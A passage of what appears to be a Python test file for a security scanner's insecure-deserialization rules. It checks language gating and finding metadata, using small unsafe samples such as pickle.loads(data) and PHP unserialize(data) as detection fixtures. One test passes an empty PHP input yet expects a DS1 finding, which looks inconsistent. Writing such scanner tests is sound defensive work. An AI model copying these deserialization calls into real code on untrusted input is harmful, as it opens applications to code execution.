= _run("const obj = JSON.parse(userInput);\n", "handler.js") + assert not any(f.rule_id.startswith("DS") for f in findings) + + +class TestLanguageGating: + def test_python_file_not_scanned_here(self): + # Python is owned by behavioral_ast (AST10) / taint (TT6); this module skips it + # so it does not emit duplicate, lower-quality findings. + findings = _run("import pickle\npickle.loads(data)\n", "script.py") + assert findings == [] + + def test_php_pattern_does_not_fire_on_ruby(self): + # bare unserialize() is PHP-only; a Ruby file must not match DS1. + findings = _run("x = unserialize(data)\n", "thing.rb") + assert not any(f.rule_id == "DS1" for f in findings) + + def test_unknown_extension_no_findings(self): + findings = _run("unserialize(data)\n", "notes.txt") + assert findings == [] + + +class TestFindingMetadata: + def test_finding_has_remediation_and_context(self): + findings = _run("", "x.php") + ds1 = [f for f in findings if f.rule_id == "DS1"] + assert ds1[0].remediation + assert ds1[0].context is not None + assert ds1[0].category == "Insecure Deserialization"